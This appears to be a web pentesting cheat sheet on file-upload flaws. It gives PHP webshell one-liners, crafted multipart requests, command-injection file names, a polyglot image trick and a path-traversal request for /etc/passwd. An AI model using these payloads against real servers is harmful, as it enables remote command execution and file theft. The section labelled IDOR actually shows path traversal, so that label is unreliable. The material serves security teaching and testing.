1. Unrestricted File Type Upload:
Allowing users to upload files without proper validation can lead to the execution of malicious scripts. An attacker may upload a file with a double extension, such as βmalicious.php.jpg,β tricking the system into treating it as an image file while executing PHP code.
Example Payloads:
1
<?php echo passthru($_GET['cmd']); ?>
1
<?php echo exec($_POST['cmd']); ?>
1
<?php system($_GET['cmd']); ?>
1
<?php passthru($_REQUEST['cmd']); ?>
Request Snippet:
1
2
3
4
5
6
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="malicious.php.jpg"
Content-Type: image/jpeg
...binary data of the image...
2. File Size Limit Bypass:
Attackers can attempt to bypass file size restrictions by compressing files or splitting them into smaller parts. This may allow them to upload content exceeding the specified limits.
Example Payload:
1
2
# Splitting a file into parts
split -b 1M largefile.txt part
Request Snippet:
1
2
3
4
5
6
7
8
9
10
11
12
13
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="part1"
Content-Type: text/plain
...binary data of part 1...
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="part2"
Content-Type: text/plain
...binary data of part 2...
3. Malicious File Content:
Attackers may manipulate file content to include malicious scripts or payloads, exploiting vulnerabilities in server-side processing.
Example Payload:
1
<script>alert('XSS Attack');</script>
Request Snippet:
1
2
3
4
5
6
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="malicious.html"
Content-Type: text/html
<script>alert('XSS Attack');</script>
4. Path Traversal Attacks:
Path traversal vulnerabilities may allow attackers to upload files outside the intended directory, potentially gaining unauthorized access to sensitive information.
The restrication may not be in the previous directory ! π
Example Payload:
1
2
3
4
5
6
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="../sensitivefile.txt"
Content-Type: text/plain
...binary data of the file...
Remote Command Execution (RCE) via File Name Parameter
If the application includes custom image processing or file manipulation, it may be susceptible to remote command execution through code injection in the file name.
Example Valid File Names and Payloads:
File Name | Payload | Outcome if Vulnerable |
---|---|---|
a$(whoami)z.jpg | $(whoami) | a[CURRENT USER]z.jpg |
a`whoami`z.jpg | `whoami` | a[CURRENT USER]z.jpg |
a;sleep 30;z.jpg | ;sleep 30; | The application will take 30+ seconds to respond |
5. Denial of Service (DoS) through File Uploads:
Attackers may overwhelm the server by uploading a large number of files simultaneously.
Example Payload:
1
2
# Generating a large file
dd if=/dev/zero of=largefile.txt bs=1M count=100
Request Snippet:
1
2
3
4
5
6
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="largefile.txt"
Content-Type: application/octet-stream
...binary data of the large file...
6. Image-Based Attacks (Polyglot):
Exploiting vulnerabilities in image processing libraries to execute arbitrary code.
simple way to achive this is using exiftool and embed the php webshell via comeents
Example Payload (Image with Embedded Malicious Code):
1
2
# Embedding malicious code in an image
echo -n '<?php system("ls -la"); ?>' >> malicious.jpg
Request Snippet:
1
2
3
4
5
6
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="malicious.jpg"
Content-Type: image/jpeg
...binary data of the image...
7. Insecure Direct Object References (IDOR):
Vulnerability Description: File upload functionalities may introduce IDOR vulnerabilities, allowing attackers to manipulate file references.
Example Payload:
1
GET /download?file=../../../etc/passwd HTTP/1.1
In this case, an attacker manipulates the file parameter to access sensitive files.
These examples illustrate the technical aspects of common file upload vulnerabilities and highlight the importance of implementing robust security measures to protect against them. Always validate, sanitize, and restrict file uploads to ensure the integrity and security of your web application.